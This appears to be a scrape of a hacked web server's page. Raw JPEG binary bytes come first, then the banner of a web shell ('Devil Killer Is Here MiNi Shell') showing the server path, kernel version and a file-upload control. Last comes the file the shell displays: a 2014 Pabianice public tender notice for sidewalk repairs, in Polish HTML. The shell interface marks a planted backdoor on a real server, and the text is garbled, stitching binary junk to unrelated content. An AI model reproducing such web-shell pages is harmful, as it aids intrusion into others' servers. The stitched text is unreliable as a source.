JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/92347-N-2014.html

<p class="kh_header"><b>Pabianice: REMONT CHODNIKÓW WRAZ Z ROBOTAMI TOWARZYSZĄCYMI NA ULICACH GMINNYCH BĘDĄCYCH W ZARZĄDZIE ZAMAWIAJĄCEGO</b><br>
<b>Numer ogłoszenia: 92347 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Zieleni Miejskiej w Pabianicach , ul. Warzywna 1, 95-200 Pabianice, woj. łódzkie, tel. 042 2159772, 2159537 w. 23, faks 042 2159537.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.pabianice.pl/index.php?idmp=701&r=o</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT CHODNIKÓW WRAZ Z ROBOTAMI TOWARZYSZĄCYMI NA ULICACH GMINNYCH BĘDĄCYCH W ZARZĄDZIE ZAMAWIAJĄCEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z remontem chodników wraz z robotami towarzyszącymi na ulicach gminnych będących w zarządzie Zamawiającego według poniższego wykazu:
1.1 Część I:
1) ulica PIOTRA SKARGI (odcinek: ulica Nawrockiego - ulica Dobra, strona południowa) o długości ok. 351 m i powierzchni łącznie z wjazdami 802 m2, 
2) ulica DOLNA (odcinek: ulica Myśliwska - parking, strona południowa) o długości ok. 64 m i powierzchni 131 m2
1.2. Część II:
a) ulica ŁASKA (odcinek: od ulicy Tkackiej w stronę zachodnią, strona południowa) o długości ok. 110 m i powierzchni 851 m2
b) ulica ŚNIADECKIEGO (odcinek: ulica Wileńska - ulica Moniuszki, strona wschodnia) o długości ok. 197 m i powierzchni łącznie z wjazdami 714 m2
1.3.Część III:
a) ulica TOROWA (odcinek: przejazd kolejowy - ulica Karniszewicka, strona zachodnia) o długości ok. 198 m i powierzchni łącznie z wjazdami 549 m2
b) ulica TOROWA (odcinek: ulica Wspólna - wjazd do GS, strona zachodnia) o długości 459 m i powierzchni łącznie z wjazdami 886 m2                                          
1.4.Część IV:
a) ulica MOKRA (odcinek: ulica Smugowa - droga wewnętrzna PSM, strona południowa) o długości 192 m i powierzchni łącznie z wjazdami 393 m2
b) ulica ZAMKOWA (odcinek: ulica Wyspiańskiego - ulica Wyszyńskiego, strona południowa) o długości 195 m i powierzchni 607 m2
c) ulica GROTA ROWECKIEGO (okolice wjazdu do SP nr 3, strona południowa) o długości 110 m i powierzchni 348 m2
d) ulica OSSOWSKIEGO (okolice bloku nr 47/49, strona południowa) o długości 122 m i powierzchni 805 m
Zamawiający dopuszcza możliwość składania ofert częściowych według powyższego podziału.
2. Szczegółowy opis przedmiotu zamówienia:
a) ulica Piotra Skargi (odcinek: ulica Nawrockiego - ulica Dobra, strona południowa)
- rozebranie obrzeży trawnikowych o wymiarach 6x20 cm na podsypce piaskowej,
- rozebranie chodników z płyt betonowych 50x50x7 cm na podsypce piaskowej,
- rozebranie krawężnika 15x30 cm na ławie betonowej z oporem,
- transport gruzu samochodem samowyładowczym na odległość do 5 km,
- koryta wykonywane mechanicznie gł. 40 cm (wjazdy)
- warstwa odsączająca gr. 10 cm (wjazdy)
- podbudowa z kruszywa gr. 15 cm (wjazdy)
- obrzeża betonowe o wymiarach 6x20 cm, na podsypce cementowo - piaskowej (stabilizacja 5 Mpa, spoiny wypełnione piaskiem,
- ustawienie krawężnika 15x30 cm na ławie betonowej z oporem,
- nawierzchnie z kostki brukowej betonowej, szarej, gr. 8 cm, na podsypce cementowo - piaskowej gr. 5 cm, (stabilizacja 5 Mpa)
- emont cząstkowy nawierzchni mieszanką mineralno - bitumiczną gr. 5 cm,
- regulacja pionowa studzienek dla urządzeń podziemnych.
b) ulica DOLNA (odcinek: ulica Myśliwska - parking, strona południowa)
- rozebranie chodników z płyt 50x50x7 cm na podsypce piaskowej,
- rozebranie obrzeży 6x20 cm na podsypce piaskowej,
- wywóz gruzu na odl. 5 km,
- koryta wykonywane mechanicznie gł. 20 cm
- ustawienie obrzeża 6x20x100 cm na podsypce cementowo - piaskowej gr. 5 cm (stabilizacja 5 Mpa),
- ułożenie kostki gr. 8 cm na podsypce cementowo - piaskowej gr. 5 cm (stabilizacja 5 MPa)
c) ulica ŁASKA (odcinek: od ulicy Tkackiej w stronę zachodnią, strona południowa)
- rozebranie obrzeży trawnikowych o wymiarach 6x20 cm na podsypce piaskowej,
- rozebranie chodników z płyt betonowych 50x50x7 cm na podsypce piaskowej,
- wywóz gruzu na odległość do 5 km,
- koryta wykonywane mechanicznie gł. 10 cm,
- obrzeża betonowe o wymiarach 6x20 cm, na podsypce cementowo - piaskowej (stabilizacja 5 MPa), spoiny wypełnione piaskiem,
- nawierzchnie z kostki brukowej betonowej, szarej, gr. 8 cm, na podsypce cementowo - piaskowej (stabilizacja 5 Mpa),
- regulacja pionowa studzienek dla urządzeń podziemnych.
d) ulica ŚNIADECKIEGO (odcinek: ulica Wileńska - ulica Moniuszki, strona wschodnia)
- rozebranie krawężnika 15x30 cm na ławie betonowej z oporem,
- rozebranie obrzeży 6x20 cm na podsypce cementowo - piaskowej,
- rozebranie chodnika z płyt 35x35 cm na podsypce piaskowej,
- rozebranie nawierzchni z trylinki gr. 15 cm,
- wywóz gruzu na odległość 5 km.
- koryta wykonywane mechanicznie gł. 40 cm, 20 cm i 10 cm,
- warstwa odsączajaca gr. 10 cm (wjazdy + miejsca postojowe)
- podbudowa z kruszywa gr. 15 cm (wjazdy + miejsca postojowe)
- ustawienie krawężnika 15x30 cm na ławie betonowej z oporem,
- ustawienie obrzeży 6x20 cm na podsypce cementowo - piaskowej gr. 5 cm (stabilizacja 5 Mpa)
 - ułożenie kostki gr. 8 cm na podsypce cementowo - piaskowej gr. 5 cm (stabilizacja 5 Mpa)
- remont cząstkowy nawierzchni masą mineralno - bitumiczną gr. 5 cm
- regulacja pionowa studzienek dla urządzeń podziemnych.
e) ulica TOROWA (odcinek: przejazd kolejowy - ulica Karniszewicka, strona zachodnia)
- rozebranie chodnika z płyt 50x50 cm na podsypce piaskowej,
- rozebranie wjazdów z trylinki gr. 15 cm,
- wywóz gruzu na odległość 5 km,
- koryta wykonywane mechanicznie na gł. 25 cm i 10 cm,
- warstwa odsączająca gr. 10 cm (wjazdy)
- podbudowa z kruszywa gr. 15 cm (wjazdy)
- ustawienie obrzeża 6x20 cm na podsypce cementowo - piaskowej (stabilizacja 5 Mpa),
- ułożenie kostki gr. 8 cm na podsypce cementowo - piaskowej gr. 5 cm (stabilizacja 5 Mpa),
- regulacja pionowa studzienek dla urządzeń podziemnych,
f) ulica TOROWA (odcinek: ulica Wspólna - wjazd do GS, strona zachodnia)
- rozebranie chodnika z płyt 50x50 cm na podsypce piaskowej,
- wywóz gruzu na odległość 5 km,
- koryta wykonywane mechanicznie gł. 15 cm i 40 cm,
- warstwa odsączająca gr. 10 cm (wjazdy),
- podbudowa z kruszywa gr. 15 cm (wjazdy),
- ustawienie obrzeży 6x230 cm na podsypce cementowo - piaskowej (stabilizacja 5 Mpa),
- ułożenie kostki gr. 8 cm na podsypce cementowow - piaskowej gr. 5 cm (stabilizacja 5 Mpa - wjazdy)
- ułożenie płyt chodnikowych 50x50x7 cm na podsypce cementowo - piaskowej gr. 5 cm (stabilizacja  5 MPa)
- regulacja krawężnika 20x30 cm na ławie betonowej z oporem,
- regulacja pionowa studzienek dla urządzeń podziemnych.
g) ulica MOKRA (odcinek: ulica Smugowa - droga wewnętrzna PSM, strona południowa)
- rozebranie krawężników 15x30x100 cm na ławie betonowej z oporem,
- rozebranie chodnika z płyt 50x50x7 cm na podsypce piaskowej,
- rozebranie obrzeży 6x20x100 cm na podsypce piaskowej,
- wywóz gruzu na odległość 5 km
- koryta wykonywane mechanicznie gł. 40 cm (wjazdy) I 15 cm (chodnik),
- warstwa odsączająca gr. 10 cm (wjazdy),
- podbudowa z kruszywa gr. 15 cm (wjazdy),
- ustawienie obrzeża 6x20x100 cm na podsypce cementowo - piaskowej (stabilizacja 5 Mpa)
- ustawienie krawężnika 15x30x100 cm na ławie betonowej z oporem,
- ułożenie kostki gr. 8 cm na podsypce cementowo - piaskowej gr. 5 cm (stabilizacja 5 Mpa)
- remont cząstkowy masą mineralno - bitumiczną gr. 5 cm,
h) ulica ZAMKOWA (odcinek: ulica Wyspiańskiego - ulica Wyszyńskiego, strona południowa
- rozebranie krawężnika 20x30x100 cm na ławie betonowej z oporem,
- rozebranie kostki gr. 8 cm na podsypce cementowo - piaskowej,
- koryta wykonywane mechanicznie gł. 40 cm,
- ustawienie obrzeża 8x30x100 cm na podsypce cementowo - piaskowej (stabilizacja 5 Mpa)
- ustawienie krawężnika 20x30x100 cm na ławie betonowej z oporem (odzysk)
- warstwa odsączająca gr. 10 cm,
- podbudowa z kruszywa gr. 15 cm,
- ułożenie kostki gr. 8 cm na podsypce cementowo - piaskowej gr. 5 cm - stabilizacja 5 MPa (odzysk),
i) ulica GROTA ROWECKIEGO (okolice wjazdu do SP nr 3, strona południowa)
- rozebranie chodnika z płyt 50x50x7 cm na podsypce piaskowej,
- rozebranie obrzeży 6x20x100 cm na podsypce piaskowej,
- wywóz gruzu na odległość 5 km,
- koryta wykonywane mechanicznie gł. 20 cm,
- ustawienie obrzeża 6x20x100 cm na podsypce cementowo - piaskowej (stabilizacja 5 Mpa),
- ułożenie kostki gr. 8 cm na podsypce cementowo - piaskowej (stabilizacja 5 Mpa)
- regulacja pionowa studzienek dla urządzeń podziemnych,
j) ulica OSSOWSKIEGO (okolice bloku nr 47/49, strona południowa)
- rozebranie krawężnika 15x30x100 cm na ławie betonowej z oporem,
- rozebranie chodnika z płyt 50x50x7 cm na podsypce piaskowej,
- rozebranie obrzeży 6x20x100 cm na podsypce piaskowej,
- wywóz gruzu na odległość 5 km,
- ustawienie krawężnika 15x30x100 cm na ławie betonowej z oporem,
- koryta wykonywane mechanicznie gł. 40 cm i 25 cm (miejsca postojowe, chodnik)
- warstwa odsączająca gr. 10 cm, (miejsca postojowe),
- podbudowa z kruszywa gr. 15 cm (miejsca postojowe),
- ustawienie obrzeży 6x20x100 cm na podsypce cementowo - piaskowej (stabilizacja 5 Mpa),
- ułożenie kostki gr. 8 cm na podsypce cementowo - piaskowej gr. 5 cm (stabilizacja 5 Mpa)
- remont cząstkowy nawierzchni masą mineralno - bitumiczną gr. 5 cm,
- regulacja pionowa studzienek dla urządzeń podziemnych,
- remont cząstkowy chodników z kostki gr. 6 cm na podsypce cementowo - piaskowej,
3. Zakres prac szczegółowo określa dokumentacja projektowo - kosztorysowa, na która składają się:
1) Materiały zgłoszeniowe niezbędne do realizacji robót budowlanych, a wynikające z przepisów ustawy Prawo Budowlane - załącznik nr 1 do specyfikacji istotnych warunków zamówienia,
2) Specyfikacje techniczne wykonania i odbioru robót budowlanych - załącznik nr 2 do  specyfikacji istotnych warunków zamówienia,
3) Kosztorysy nakładcze (przedmiar robót) - załącznik nr 3 do specyfikacji istotnych warunków zamówienia.
4. Miejsce realizacji przedmiotu zamówienia: miasto Pabianice.
5. Wykonawca udzieli Zamawiającemu minimum 24 - miesięcznej gwarancji na zrealizowany (wykonany) przedmiot zamówienia, datą rozpoczęcia okresu gwarancji będzie data podpisania końcowego bezusterkowego protokołu odbioru końcowego, udzielona gwarancja nie wyłącza odpowiedzialności Wykonawcy z tytułu rękojmi za wady przedmiotu umowy wynikającej z przepisów Kodeksu Cywilnego. 
6. Termin realizacji zamówienia: od momentu podpisania umowy:
1) Część I  - do dnia 30.06.2014 roku,
2) Część II  - do dnia 18.07.2014 roku. 
3) Część III  - do dnia 07.08.2014 roku.
4) Część IV  - do dnia 31.08.2014 roku.
Zamawiający wymaga aby Wykonawca po podpisaniu umowy przedstawił harmonogram terminowy wykonywania robót.
7. Uwagi realizacyjne:
1) Zamawiający informuje, że przedstawiony przedmiar jest dokumentem pomocniczym. Umowa zostanie zawarta za cenę ryczałtową obejmującą zakres rzeczowy zamówienia określony w specyfikacji istotnych warunków zamówienia, a kwota wynagrodzenia ryczałtowego stanowić będzie wartość zobowiązania.
2) Wykonawca przed złożeniem oferty powinien dokonać wizji lokalnej w terenie,
3) Wykonawca będzie zwolniony z ponoszenia opłat za zajęcie pasa drogowego w trakcie realizacji zamówienia w okresie narzuconym przez Zamawiającego, w przypadku niedotrzymania określonego przez Zamawiającego czasookresu realizacji, oprócz naliczenia kar umownych, Wykonawca będzie ponosił opłaty za zajęcie pasa drogowego według obowiązujących stawek,
4) Wykonawca zobowiązany jest do opracowania, uzgodnienia i wdrożenia na swój koszt projektów tymczasowej organizacji ruchu oraz po zakończeniu prac do przywrócenia stanu pierwotnego,
5) Zamawiający zastrzega sobie prawo udzielenia zamówienia uzupełniającego do wysokości 50% zamówienia podstawowego.
6) Od daty protokolarnego przekazania terenu robót do chwili protokolarnego odbioru robót Wykonawca ponosi odpowiedzialność wobec osób trzecich oraz Zamawiającego za wszelkie szkody powstałe na tym terenie i w przedmiocie umowy.
8. Warunki finansowe rozliczeń:
a). Zamawiający dopuszcza możliwość fakturowania etapowego (wystawiania faktur częściowych) z zastrzeżeniem, iż będzie to rozumiane jako fakturowanie etapowe dla poszczególnych ulic, podstawą wystawienia faktur (częściowych lub końcowej) będzie obustronnie podpisany protokół odbioru robót częściowych lub końcowy; Obowiązkiem Wykonawcy jest udokumentowanie w sposób określony obowiązującymi przepisami prawa prawidłowe pod względem jakościowym i rzeczowym wykonanie robót. Do odbioru końcowego należy załączyć: obmiar wykonywanych robót potwierdzony przez kierownika budowy, inspektora nadzoru, certyfikaty, deklaracje zgodności, atesty na wbudowane materiały, protokoły prób i regulacji oraz inne dokumenty niezbędne do oceny prawidłowości wykonanych robót.
b). przebieg czynności odbiorowych:
a. Zakończenie wykonania robót Wykonawca zgłasza na piśmie Zamawiającemu.
b. Odbiór dokonywany będzie w oparciu o SIWZ, obowiązujące przepisy prawa budowlanego i  Polskie Normy
c. Zamawiający zobowiązuje się przystąpić do odbioru końcowego wykonanych robót w ciągu 14 dni od dnia ich zakończenia i zgłoszenia przez Wykonawcę gotowości do obioru końcowego.
d. Zamawiający dokonuje odbioru z udziałem Wykonawcy i po powiadomieniu właściwych organów. Wykonawca dostarczy dokumenty i zezwolenia niezbędne do odbioru robót i użytkowania obiektów.
c). każdorazowo wynagrodzenie będzie płatne przelewem w terminie do 30 dni od daty otrzymania oryginału faktury.
d). podane w ofercie wynagrodzenie jest stałe i nie podlega waloryzacji w trakcie obowiązywania umowy.
e). sposób rozliczeń - wynagrodzenie ryczałtowe określone na podstawie kosztorysu ofertowego złożonego przez Wykonawcę na etapie ofertowania.
9. Kody CPV:
- 45.23.32.22 - 1 - Roboty budowlane w zakresie układania chodników i asfaltowania

Uwaga: 
1. Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów i urządzeń niż podane, pod warunkiem zapewnienia parametrów nie gorszych niż określone. W takiej sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały i urządzenia. W przypadku wystąpienia w kosztorysie nakładczym i specyfikacji technicznej wykonania i odbioru robót budowlanych nazw własnych, wskazujących na konkretnych producentów materiałów i urządzeń, należy traktować je jako przykładowe.
2. Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia, a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszt dokonania wizji lokalnej terenu budowy poniesie Wykonawca.
3. Wykonawca winien wszelkie koszty związane z w/w czynnościami odbiorowymi uwzględnić w cenie oferty..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do wysokości 50% zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia.
Ocena spełniania warunku nastąpi w oparciu o oświadczenie oraz dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia oraz złożenie wykazu (wzór w SIWZ) zrealizowanych minimum 3 podobnych zamówień, tj. wykonania robót remontowych (modernizacyjnych) i/lub inwestycyjnych drogowych (tj. remont i/lub budowa powierzchni utwardzonych z płyt betonowych i/lub kostki betonowej) o wartości brutto każdej z nich równej minimum 50.000,00 zł i zrealizowanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie;
Ocena spełniania warunku nastąpi w oparciu o dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia.
Ocena spełniania warunku nastąpi w oparciu o oświadczenie oraz dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia.
Ocena spełniania warunku nastąpi w oparciu o oświadczenie oraz dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia oraz przedłożenie aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości nie mniejszej niż 150.000,00 zł
Ocena spełniania warunku nastąpi w oparciu o dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przedłożenie minimum 3 robót polegających na wykonaniu robót remontowych (modernizacyjnych) i/lub inwestycyjnych drogowych (tj. remont i/lub budowa powierzchni utwardzonych z płyt betonowych i/lub kostki betonowej) o wartości brutto każdej z nich równej minimum 50.000,00 zł
- Dowodami, o których mowa powyżej, z zastrzeżeniem zapisów §9 ust. 2 w/w rozporządzenia są:
- poświadczenie;
- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt powyżej;
- W przypadku gdy zamawiający jest podmiotem, na rzecz którego roboty wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

